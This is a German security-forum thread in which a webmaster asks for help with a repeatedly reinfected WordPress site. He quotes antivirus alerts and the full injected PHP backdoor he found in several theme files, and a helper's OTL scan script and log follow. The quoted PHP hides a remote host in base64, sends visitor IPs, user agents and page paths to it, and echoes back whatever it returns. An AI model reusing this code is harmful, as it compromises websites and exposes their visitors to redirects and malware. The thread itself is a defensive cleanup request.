Trojaner-Board - Eigene Webseite mit Malware verseucht

Trojaner-Board (https://www.trojaner-board.de/)

- Plagegeister aller Art und deren Bekämpfung (https://www.trojaner-board.de/plagegeister-aller-art-deren-bekaempfung/)

- - Eigene Webseite mit Malware verseucht (https://www.trojaner-board.de/131235-eigene-webseite-malware-verseucht.html)

Eigene Webseite mit Malware verseucht

Hallo zusammen,

ich kenne das Forum schon länger und bin begeistert von dem Service der hier geboten wird. Jetzt ist es soweit, dass ich selber ein Problem habe, mit dem ich selber nicht mehr weiter komme. Ich hoffe, dass ich hier genauso tolle Hilfe bekomme, wie es viele andere schon bekommen haben.

Ich bin Webmaster einer Internetseite (www.tus-schildgen.de). Schon seit Monaten habe ich immer wieder mit Viren auf der Seite zu kämpfen. Verschiedene Virenmeldungen, die ich im Laufe der letzten Monate von verschiedenen Leuten bekommen habe, hänge ich an. Der Höhepunkt war dann, dass die Webseite auf einen virenverseuchten Fantasyblog (blog.fantasygifts.com) weitergeleitet wurde, hierzu habe ich keine Virenmeldung. Meist konnte ich das Problem lösen, indem ich über FileZilla alle Dateien gelöscht und ersetzt habe, die in der letzten Zeit geändert wurde. Das Passwort habe ich dann auch immer geändert. Allerdings ging das dann immer nur für kurze Zeit gut und die Seite war ein paar Tage später wieder verseucht. Mein Laptop selber ist laut Malwarebytes virenfrei.

Jetzt habe ich mich mal intensiver mit dem Problem beschäftigt. Nun kann ich aktuell die Seite ohne Virenmeldung aufrufen, ich habe AntiVir als Virenscanner installiert.

Im Internet habe ich recherchiert und bin auf folgende Seite gestoßen: hxxp://evuln.com/hacked/redirect.html#1

Im Verlauf meiner weiteren Recherche stieß ich dann noch auf diesen Artikel: hxxp://paid4magazin.de/index.php/base64-eval-php-script-hack-php-trojaner-befallt-webseiten-durch-malware/

Die beiden Seiten, besonders der zweiten Artikel beschreibt genau den Malware-Code, der in den verseuchten Dateien von mir (siehe letztes angehängtes Zitat) vorhanden ist. Betroffen waren verschiedene index.php sowie page.php und footer.php. Diese habe ich alle bereinigt und der Code ist nun in keiner Datei auf der Webseite mehr vorhanden. Ist die Seite jetzt virenfrei?

Ich habe immer die aktuellste Wordpress-Version sowie aktuellste Plugins installiert gehabt. Jedoch nie die Themes aktualisiert, da ich eins selber modifziert hatte. Vielleicht lag hier der Fehler? Jetzt ist die aktuellste Version installiert. Momentan ist zwar noch etwas Chaos, aber das wird noch beseitigt.

Damit liegt das Problem (zumindest das aktuelle, wie es mit den älteren Virenmeldungen aussieht weiß ich nicht) scheinbar auf meinem eigenen Rechner. Malwarebytes zeigt jedoch keine Meldungen an.

Ich hoffe, ich habe soweit alles an Informationen gegeben, die benötigt werden um mir Erste-Hilfe zu leisten. Ziel ist es, die Webseite vollständig virenfrei zu bekommen und auch gegen zukünftige "Angriffe" zu sichern. Gibt es für die verschiedenen Virenmeldungen und das aktuelle Probleme was ich zum Schluss beschrieben habe die selbe Ursache oder handelt es sich um verschiedene Baustellen? Auch die Frage: Kann mir jemand eine Alternative zu FileZilla nennen, da hier ja ebenfalls das Problem liegen könnte? Vielen Dank schon einmal für eure Bemühungen!

Grüße,
Martin

NACHTRAG: Genau dieses Problem scheint schon länger zu bestehen. In einem alten Backup von September 2012 habe ich genau denselben Code gefunden, lediglich mit leichtgeändertem "aHR0[...]"-Schnipsel. Hier schon waren genau dieselben 10 Dateien betroffen wie aktuell auch. Also liegt hier vielleicht wirklich die Ursache für die ganzen Virenmeldungen?

Zitat:

Zitat von Virenmeldung

Kategorie:Intrusion Prevention

Datum/Uhrzeit,Risiko,Aktivität,Status,Empfohlene Aktion,Name der IPS-Warnung,Standardaktionen,Durchgeführte Aktion,Angreifender Computer,Angreifer-URL,Zieladresse,Quelladresse,Beschreibung des Datenverkehrs

25.09.2012 18:34:06,Hoch,Ein Eindringversuch von www.tus-schildgen.de wurde blockiert.,Blockiert,Keine Aktion erforderlich,Web Attack: Mass Injection Website,Keine Aktion erforderlich,Keine Aktion erforderlich,"www.tus-schildgen.de (80.67.28.124, 80)",www.tus-schildgen.de/,"HASSOPC (xxx.xxx.x.xxx, xxxxx)",xx.xx.xx.xxx (80.67.28.124),"TCP, www-http"

Netzwerkverkehr von <b>www.tus-schildgen.de/</b> entspricht der Signatur eines bekannten Angriffs. Der Angriff wurde von \DEVICE\HARDDISKVOLUME1\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE verursacht.

Zitat:

Zitat von Virenmeldung

angeforderte URL: hxxp://www.tus-schildgen.de/

Information: Enthält Erkennungsmuster des Java-Scriptvirus JS/Blacole.CV

Zitat:

Zitat von Virenmeldung

Angeforderte URL: hxxp://www.tus-schildgen.de/
Information: Enthält Erkennungsmuster des Java-Scriptvirus JS/iFrame.aas

Zitat:

Zitat von Virenverseuchter Code

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>

hi
hast du denn alle foren, cmfs etc aktualisiert? hab jetzt die seite noch nicht angesehen ist nur mal ein erster Hinweis.
passwort für ftp und sql Datenbank geendert?

Ja, das ist alles heute passiert.

Updates, änderungen aller Passwörter etc?
das muss nich nur einmal im Jahr passieren, sondern, wie beim PC auch, sofort bei erscheinen, trage dich dafür in die jeweiligen Newsletter der Hersteller ein.

Falls noch nicht vorhanden, lade Dir bitte OTL von Oldtimer herunter und speichere es auf Deinem Desktop

Starte bitte die
OTL.exe
.
Vista und Win7 User mit Rechtsklick "als Administrator starten"
Kopiere nun den Inhalt in die http://larusso.trojaner-board.de/Images/otlfix.jpg
Textbox.

Code:

activex

netsvcs

msconfig

%SYSTEMDRIVE%\*.

%PROGRAMFILES%\*.exe

%LOCALAPPDATA%\*.exe

%systemroot%\*. /mp /s

C:\Windows\system32\*.tsp

/md5start

userinit.exe

eventlog.dll

scecli.dll

netlogon.dll

cngaudit.dll

ws2ifsl.sys

sceclt.dll

ntelogon.dll

winlogon.exe

logevent.dll

user32.DLL

explorer.exe

iaStor.sys

nvstor.sys

atapi.sys

IdeChnDr.sys

viasraid.sys

AGP440.sys

vaxscsi.sys

nvatabus.sys

viamraid.sys

nvata.sys

nvgts.sys

iastorv.sys

ViPrt.sys

eNetHook.dll

ahcix86.sys

KR10N.sys

nvstor32.sys

ahcix86s.sys

/md5stop

%systemroot%\system32\drivers\*.sys /lockedfiles

%systemroot%\System32\config\*.sav

%systemroot%\system32\*.dll /lockedfiles

%USERPROFILE%\*.*

%USERPROFILE%\Local Settings\Temp\*.exe

%USERPROFILE%\Local Settings\Temp\*.dll

%USERPROFILE%\Application Data\*.exe

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems|Windows /rs

CREATERESTOREPOINT

Schliesse bitte nun alle Programme. (Wichtig)
Klicke nun bitte auf den Quick Scan Button.
Kopiere
nun den Inhalt aus OTL.txt und Extra.txt hier in Deinen Thread

Vielen Dank schon einmal! Teilweise auch regelmäßig, heute aber alle Passwörter geändert und Updates gemacht (daher sieht die Seite auch noch nicht wieder ganz rund aus). Vermutlich war ich hier nicht immer genug hinterher und da lag der Fehler... Hier die beiden Logdateien

[QUOTE=OTL.txt]OTL Logfile:

Code:

OTL logfile created on: 18.02.2013 23:28:40 - Run 1

OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\TuS\Desktop

Windows Vista Home Basic Edition Service Pack 2 (Version = 6.0.6002) - Type = NTWorkstation

Internet Explorer (Version = 9.0.8112.16421)

Locale: 00000407 | Country: Deutschland | Language: DEU | Date Format: dd.MM.yyyy

 

1,93 Gb Total Physical Memory | 0,84 Gb Available Physical Memory | 43,54% Memory free

4,10 Gb Paging File | 2,67 Gb Available in Paging File | 65,16% Paging File free

Paging file location(s): ?:\pagefile.sys [binary data]

 

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files

Drive C: | 222,88 Gb Total Space | 174,72 Gb Free Space | 78,39% Space Free | Partition Type: NTFS

Drive D: | 1021,00 Mb Total Space | 1015,54 Mb Free Space | 99,46% Space Free | Partition Type: FAT32

Drive E: | 9,00 Gb Total Space | 1,65 Gb Free Space | 18,38% Space Free | Partition Type: NTFS

Drive G: | 1863,01 Gb Total Space | 1809,74 Gb Free Space | 97,14% Space Free | Partition Type: NTFS

Drive H: | 465,65 Gb Total Space | 206,65 Gb Free Space | 44,38% Space Free | Partition Type: FAT32

 

Computer Name: TUS-PC | User Name: TuS | Logged in as Administrator.

Boot Mode: Normal | Scan Mode: Current user | Quick Scan

Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days

 
 ========== Processes (SafeList) ==========

 

PRC - [2013.02.18 23:27:47 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\TuS\Desktop\OTL.exe

PRC - [2013.01.09 15:22:08 | 000,389,168 | ---- | M] (Mozilla Corporation) -- C:\Programme\Mozilla Thunderbird\thunderbird.exe

PRC - [2012.12.14 10:17:04 | 003,467,768 | ---- | M] (TeamViewer GmbH) -- C:\Programme\TeamViewer\Version8\TeamViewer_Service.exe

PRC - [2012.10.25 20:26:26 | 000,527,216 | ---- | M] (AnchorFree Inc.) -- C:\Programme\Hotspot Shield\bin\openvpnas.exe

PRC - [2012.10.25 20:24:22 | 000,389,488 | ---- | M] () -- C:\Programme\Hotspot Shield\bin\hsswd.exe

PRC - [2012.10.25 20:20:26 | 000,418,672 | ---- | M] (AnchorFree Inc.) -- C:\Programme\Hotspot Shield\HssWPR\HssSrv.exe

PRC - [2012.08.08 11:47:47 | 000,348,664 | ---- | M] (Avira Operations GmbH & Co. KG) -- C:\Programme\Avira\AntiVir Desktop\avgnt.exe

PRC - [2012.07.27 21:51:26 | 000,063,960 | ---- | M] (Adobe Systems Incorporated) -- C:\Programme\Common Files\Adobe\ARM\1.0\armsvc.exe

PRC - [2012.05.08 15:53:01 | 000,086,224 | ---- | M] (Avira Operations GmbH & Co. KG) -- C:\Programme\Avira\AntiVir Desktop\sched.exe

PRC - [2012.05.08 15:52:55 | 000,080,336 | ---- | M] (Avira Operations GmbH & Co. KG) -- C:\Programme\Avira\AntiVir Desktop\avshadow.exe

PRC - [2012.05.08 15:52:54 | 000,110,032 | ---- | M] (Avira Operations GmbH & Co. KG) -- C:\Programme\Avira\AntiVir Desktop\avguard.exe

PRC - [2011.09.05 14:10:44 | 000,040,960 | ---- | M] () -- C:\Users\TuS\AppData\Roaming\OCS\SM\SearchAnonymizerHelper.exe

PRC - [2009.04.11 07:27:36 | 002,926,592 | ---- | M] (Microsoft Corporation) -- C:\Windows\explorer.exe

PRC - [2009.04.11 07:27:28 | 000,069,120 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\conime.exe

PRC - [2009.03.03 12:45:11 | 000,296,400 | ---- | M] () -- C:\Programme\Verbindungsassistent\WTGService.exe

PRC - [2008.08.26 18:02:24 | 000,014,336 | ---- | M] (Agere Systems) -- C:\Programme\LSI SoftModem\agrsmsvc.exe

PRC - [2008.05.28 13:27:52 | 000,090,112 | ---- | M] (Andrea Electronics Corporation) -- C:\Windows\System32\AEADISRV.EXE

PRC - [2008.01.19 08:38:38 | 001,008,184 | ---- | M] (Microsoft Corporation) -- C:\Programme\Windows Defender\MSASCui.exe

PRC - [2008.01.19 08:33:39 | 000,896,512 | ---- | M] (Microsoft Corporation) -- C:\Programme\Windows Media Player\wmpnetwk.exe

PRC - [2008.01.19 08:33:39 | 000,202,240 | ---- | M] (Microsoft Corporation) -- C:\Programme\Windows Media Player\wmpnscfg.exe

PRC - [2007.09.02 12:58:52 | 000,495,616 | ---- | M] () -- C:\Programme\RocketDock\RocketDock.exe

 

 
 ========== Modules (No Company Name) ==========

 

MOD - [2013.02.16 21:25:22 | 012,433,920 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\e64304962098e90f0d3f4c33c1b080a6\System.Windows.Forms.ni.dll

MOD - [2013.01.11 11:57:15 | 000,998,400 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management\f042f66c2ad8fd5b8c34fa22cd22079e\System.Management.ni.dll

MOD - [2013.01.10 20:29:26 | 001,593,856 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\78157a494dc9a7e52be8840decfcd9cc\System.Drawing.ni.dll

MOD - [2013.01.10 20:27:01 | 007,977,984 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System\cc149d08e75f8c53cd28ac926b38c370\System.ni.dll

MOD - [2013.01.10 20:26:52 | 011,492,352 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\2227d1559f87943255069398608d5c56\mscorlib.ni.dll

MOD - [2013.01.09 15:22:09 | 002,242,096 | ---- | M] () -- C:\Programme\Mozilla Thunderbird\mozjs.dll

MOD - [2013.01.09 15:22:09 | 000,158,256 | ---- | M] () -- C:\Programme\Mozilla Thunderbird\nsldap32v60.dll

MOD - [2013.01.09 15:22:09 | 000,022,576 | ---- | M] () -- C:\Programme\Mozilla Thunderbird\nsldappr32v60.dll

MOD - [2012.11.29 22:59:32 | 000,093,696 | ---- | M] () -- C:\Programme\FileZilla\fzshellext.dll

MOD - [2012.11.21 06:26:34 | 000,008,704 | ---- | M] () -- C:\Users\TuS\AppData\Roaming\Thunderbird\Profiles\oun4j9un.default\extensions\mintrayr@tn123.ath.cx\lib\tray_x86-msvc.dll

MOD - [2012.05.30 19:06:48 | 000,087,912 | ---- | M] () -- C:\Programme\Common Files\Apple\Apple Application Support\zlib1.dll

MOD - [2012.05.30 19:06:30 | 001,242,512 | ---- | M] () -- C:\Programme\Common Files\Apple\Apple Application Support\libxml2.dll

MOD - [2007.09.02 12:58:52 | 000,495,616 | ---- | M] () -- C:\Programme\RocketDock\RocketDock.exe

MOD - [2007.09.02 12:57:36 | 000,069,632 | ---- | M] () -- C:\Programme\RocketDock\RocketDock.dll

 

 
 ========== Services (SafeList) ==========

 

SRV - [2013.02.08 16:58:20 | 000,251,248 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)

SRV - [2013.02.08 16:40:03 | 000,115,608 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Programme\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)

SRV - [2012.12.14 10:17:04 | 003,467,768 | ---- | M] (TeamViewer GmbH) [Auto | Running] -- C:\Programme\TeamViewer\Version8\TeamViewer_Service.exe -- (TeamViewer8)

SRV - [2012.10.25 20:26:26 | 000,527,216 | ---- | M] (AnchorFree Inc.) [Auto | Running] -- C:\Programme\Hotspot Shield\bin\openvpnas.exe -- (hshld)

SRV - [2012.10.25 20:24:22 | 000,389,488 | ---- | M] () [Auto | Running] -- C:\Programme\Hotspot Shield\bin\hsswd.exe -- (HssWd)

SRV - [2012.10.25 20:20:26 | 000,418,672 | ---- | M] (AnchorFree Inc.) [Auto | Running] -- C:\Programme\Hotspot Shield\HssWPR\HssSrv.exe -- (HssSrv)

SRV - [2012.10.25 01:06:44 | 000,078,072 | ---- | M] () [On_Demand | Stopped] -- C:\Programme\Hotspot Shield\bin\HSSTrayService.exe -- (HssTrayService)

SRV - [2012.07.27 21:51:26 | 000,063,960 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Programme\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)

SRV - [2012.05.08 15:53:01 | 000,086,224 | ---- | M] (Avira Operations GmbH & Co. KG) [Auto | Running] -- C:\Programme\Avira\AntiVir Desktop\sched.exe -- (AntiVirSchedulerService)

SRV - [2012.05.08 15:52:54 | 000,110,032 | ---- | M] (Avira Operations GmbH & Co. KG) [Auto | Running] -- C:\Programme\Avira\AntiVir Desktop\avguard.exe -- (AntiVirService)

SRV - [2011.09.05 14:10:44 | 000,040,960 | ---- | M] () [Auto | Running] -- C:\Users\TuS\AppData\Roaming\OCS\SM\SearchAnonymizerHelper.exe -- (SearchAnonymizer)

SRV - [2009.03.03 12:45:11 | 000,296,400 | ---- | M] () [Auto | Running] -- C:\Programme\Verbindungsassistent\WTGService.exe -- (WTGService)

SRV - [2008.08.26 18:02:24 | 000,014,336 | ---- | M] (Agere Systems) [Auto | Running] -- C:\Programme\LSI SoftModem\agrsmsvc.exe -- (AgereModemAudio)

SRV - [2008.05.28 13:27:52 | 000,090,112 | ---- | M] (Andrea Electronics Corporation) [Auto | Running] -- C:\Windows\System32\AEADISRV.EXE -- (AEADIFilters)

SRV - [2008.01.19 08:38:24 | 000,272,952 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Programme\Windows Defender\MpSvc.dll -- (WinDefend)

SRV - [2008.01.19 08:33:39 | 000,896,512 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Programme\Windows Media Player\wmpnetwk.exe -- (WMPNetworkSvc)

 

 
 ========== Driver Services (SafeList) ==========

 

DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\nwlnkfwd.sys -- (NwlnkFwd)

DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\nwlnkflt.sys -- (NwlnkFlt)

DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\ipinip.sys -- (IpInIp)

DRV - File not found [Kernel | Disabled | Stopped] -- C:\Windows\system32\drivers\blbdrive.sys -- (blbdrive)

DRV - [2012.10.10 17:30:42 | 000,035,560 | ---- | M] (AnchorFree Inc.) [Kernel | System | Running] -- C:\Windows\System32\drivers\hssdrv6.sys -- (HssDRV6)

DRV - [2012.10.10 17:30:40 | 000,033,512 | ---- | M] (AnchorFree Inc) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\taphss.sys -- (taphss)

DRV - [2012.05.08 15:53:03 | 000,137,928 | ---- | M] (Avira GmbH) [Kernel | System | Running] -- C:\Windows\System32\drivers\avipbb.sys -- (avipbb)

DRV - [2012.05.08 15:53:03 | 000,083,392 | ---- | M] (Avira GmbH) [File_System | Auto | Running] -- C:\Windows\System32\drivers\avgntflt.sys -- (avgntflt)

DRV - [2011.09.16 15:08:07 | 000,036,000 | ---- | M] (Avira GmbH) [Kernel | System | Running] -- C:\Windows\System32\drivers\avkmgr.sys -- (avkmgr)

DRV - [2009.10.08 15:55:33 | 000,028,520 | ---- | M] (Avira GmbH) [Kernel | System | Running] -- C:\Windows\System32\drivers\ssmdrv.sys -- (ssmdrv)

DRV - [2009.08.24 08:14:30 | 000,044,544 | ---- | M] (AzureWave Technologies, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\azvusb.sys -- (azvusb)

DRV - [2009.03.27 06:48:22 | 001,810,992 | ---- | M] () [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\snp2uvc.sys -- (SNP2UVC)

DRV - [2008.11.21 20:53:40 | 001,204,128 | ---- | M] (Agere Systems) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\AGRSM.sys -- (AgereSoftModem)

DRV - [2008.11.17 15:40:22 | 003,668,480 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\NETw5v32.sys -- (NETw5v32)

DRV - [2008.08.07 14:42:12 | 000,025,392 | ---- | M] (Hewlett-Packard Corporation) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\hpdskflt.sys -- (hpdskflt)

DRV - [2008.08.07 14:31:52 | 000,034,608 | ---- | M] (Hewlett-Packard Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\Accelerometer.sys -- (Accelerometer)

DRV - [2008.07.24 11:03:56 | 000,101,760 | ---- | M] (Huawei Technologies Co., Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\ewusbmdm.sys -- (hwdatacard)

DRV - [2008.04.14 22:39:06 | 000,009,344 | ---- | M] (Hewlett-Packard Development Company, L.P.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\CPQBttn.sys -- (HBtnKey)

DRV - [2007.06.14 13:41:00 | 000,466,048 | ---- | M] (LITEON) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\Ltn_stk7070P.sys -- (Ltn_stk7070P)

DRV - [2007.06.13 18:30:20 | 000,013,440 | ---- | M] (LITEON) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\Ltn_stkrc.sys -- (Ltn_stkrc)

 

 
 ========== Standard Registry (SafeList) ==========

 

 
 ========== Internet Explorer ==========

 

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = about:blank

IE - HKLM\..\URLSearchHook: {c95a4e8e-816d-4655-8c79-d736da1adb6d} - C:\Programme\Hotspot_Shield\prxtbHots.dll (Conduit Ltd.)

IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}

IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = hxxp://www.bing.com/search?q={searchTerms}&FORM=IE8SRC

 

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,StartPageCache = 1

IE - HKCU\..\URLSearchHook: {7e111a5c-3d11-4f56-9463-5310c3c69025} - No CLSID value found

IE - HKCU\..\URLSearchHook: {c95a4e8e-816d-4655-8c79-d736da1adb6d} - C:\Programme\Hotspot_Shield\prxtbHots.dll (Conduit Ltd.)

IE - HKCU\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}

IE - HKCU\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = hxxp://search.live.com.anonymize-me.de/?anonymto=687474703A2F2F7365617263682E6C6976652E636F6D2F726573756C74732E617370783F713D7B7365617263685465726D737D267372633D7B72656665727265723A736F757263653F7D&st={searchTerms}&clid=a1056936-d944-4004-b586-578bf9be440a&pid=murb&k=0

IE - HKCU\..\SearchScopes\{426BF4AF-9A6D-4F61-B13B-E7638D4E8A35}: "URL" = hxxp://de.wikipedia.org.anonymize-me.de/?to=64652E77696B6970656469612E6F7267&st={searchTerms}&clid=a1056936-d944-4004-b586-578bf9be440a&pid=murb&mode=bounce&k=0

IE - HKCU\..\SearchScopes\{453CCCC2-B564-4517-899E-4FF9C03C456E}: "URL" = hxxp://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT1561552

IE - HKCU\..\SearchScopes\{64DFB864-E327-4243-803B-0E4366F31DBA}: "URL" = hxxp://www.myvideo.de.anonymize-me.de/?to=6D79766964656F2E6465&st={searchTerms}&clid=a1056936-d944-4004-b586-578bf9be440a&pid=murb&mode=bounce&k=0

IE - HKCU\..\SearchScopes\{83CBD1DC-4276-4D62-86EE-A48FC4B55DE5}: "URL" = hxxp://www.pricerunner.de.anonymize-me.de/?to=707269636572756E6E65722E6465&st={searchTerms}&clid=a1056936-d944-4004-b586-578bf9be440a&pid=murb&mode=bounce&k=0

IE - HKCU\..\SearchScopes\{B8EAFF3A-CFA9-4BC8-AA05-15B6CF0BF936}: "URL" = hxxp://search.ebay.de.anonymize-me.de/?to=656261792E6465&st={searchTerms}&clid=a1056936-d944-4004-b586-578bf9be440a&pid=murb&mode=bounce&k=0

IE - HKCU\..\SearchScopes\{BA45C28F-538E-4ABA-89B8-6ECE3AF2038E}: "URL" = hxxp://www.otto.de.anonymize-me.de/?to=6F74746F2E6465&st={searchTerms}&clid=a1056936-d944-4004-b586-578bf9be440a&pid=murb&mode=bounce&k=0

IE - HKCU\..\SearchScopes\{D2B767CE-7A6C-4E4A-AF76-17F8EE0E1DE1}: "URL" = hxxp://www.amazon.de.anonymize-me.de/?to=616D617A6F6E2E6465&st={searchTerms}&clid=a1056936-d944-4004-b586-578bf9be440a&pid=murb&mode=bounce&k=0

IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local

 
 ========== FireFox ==========

 

FF - prefs.js..browser.search.useDBForOrder: true

FF - prefs.js..browser.startup.homepage: "hxxp://www.google.de/"

FF - prefs.js..extensions.enabledAddons: %7BDDC359D1-844A-42a7-9AA1-88A850A938A8%7D:2.0.15

FF - prefs.js..extensions.enabledAddons: FirefoxToolbar%40gutscheindoktor.de:1.8

FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:18.0.2

FF - prefs.js..extensions.enabledItems: {ab91efd4-6975-4081-8552-1b3922ed79e2}:1.0.5.1

FF - prefs.js..extensions.enabledItems: {82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}:5.3.0.7550

FF - prefs.js..extensions.enabledItems: firejump@firejump.net:1.0.2.5

FF - prefs.js..extensions.enabledItems: {DDC359D1-844A-42a7-9AA1-88A850A938A8}:2.0.13

FF - prefs.js..extensions.enabledItems: {CAFEEFAC-0016-0000-0031-ABCDEFFEDCBA}:6.0.31

 

 

FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF32_11_5_502_149.dll ()

FF - HKLM\Software\MozillaPlugins\@adobe.com/ShockwavePlayer: C:\Windows\system32\Adobe\Director\np32dsw.dll (Adobe Systems, Inc.)

FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=:  File not found

FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()

FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.10.2: C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)

FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.10.2: C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)

FF - HKLM\Software\MozillaPlugins\@microsoft.com/WPF,version=3.5: C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)

FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)

 

FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\linkfilter@kaspersky.ru: C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2011\FFExt\linkfilter@kaspersky.ru

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 18.0.2\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2013.02.08 16:40:09 | 000,000,000 | ---D | M]

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 18.0.2\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins [2013.02.08 16:39:12 | 000,000,000 | ---D | M]

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Thunderbird 17.0.2\extensions\\Components: C:\Program Files\Mozilla Thunderbird\components [2013.01.24 21:00:01 | 000,000,000 | ---D | M]

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Thunderbird 17.0.2\extensions\\Plugins: C:\Program Files\Mozilla Thunderbird\plugins

FF - HKEY_CURRENT_USER\software\mozilla\Firefox\Extensions\\firejump@firejump.net: C:\Users\TuS\AppData\Roaming\Mozilla\Firefox\Profiles\5j2bf9y8.default\extensions\firejump@firejump.net [2012.04.12 10:27:18 | 000,000,000 | ---D | M]

FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 18.0.2\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2013.02.08 16:40:09 | 000,000,000 | ---D | M]

FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 18.0.2\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins [2013.02.08 16:39:12 | 000,000,000 | ---D | M]

FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Thunderbird 17.0.2\extensions\\Components: C:\Program Files\Mozilla Thunderbird\components [2013.01.24 21:00:01 | 000,000,000 | ---D | M]

